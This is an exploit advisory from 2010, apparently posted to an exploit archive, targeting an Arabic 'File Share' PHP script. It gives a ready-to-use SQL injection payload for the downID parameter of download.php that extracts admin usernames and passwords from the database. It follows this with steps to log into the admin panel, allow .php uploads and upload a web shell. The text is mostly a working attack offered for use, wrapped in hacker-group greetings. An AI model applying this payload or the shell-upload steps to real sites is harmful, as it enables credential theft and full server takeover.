# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# |MouDy-Dz /____/ 2o1o |
# ------------------------------------------------------------
Upload Shell
# ------------------------------------------------------------
--------------------------------------------------------------
File Share <== all version (download.php?downID=)
arabic Script
--------------------------------------------------------------
#[+] Author : MouDy-Dz #
# [+] Email : MouDy-Dz@HoTMaiL.coM #
# [+] 27-5-2010 #
# [+] Cobra Team #
# [+] Script : Upload »File share#
# All Version #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : scriptFile share\download.php?downID=
http://localhost/scriptFile share\download.php?downID=[Sql Inject]
http://127.0.0.1/scriptFile share\download.php?downID=[Sql Inject]
[Sql Inject] = -4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre
Exemple = http://localhost/scriptFile share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre
you can use another Number in (-4) *_^
After
http://localhost/scriptFile share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre
You show The Admin and The password
Login =====> admincp/login.php
exemple = http://localhost/scriptFile share\admincp/login.php
after login add .php
and go to home of script and upload your shell
web site Favorites my Of Exploit ^_^ : JusT=====> http://www.exploit-db.com
================== Greetz : all my friend ===================
* Sn!per-dz * * بحر&الحب * KONDAMNE * AntiSystem * Antitracker |
و الى جميع اعضاء فريق كوبرا
================== Greetz : My Best Forum ===================
* www.3asfh.com / www.Dev-point.com /www.h4ckforu.com /www.sa3eka.com
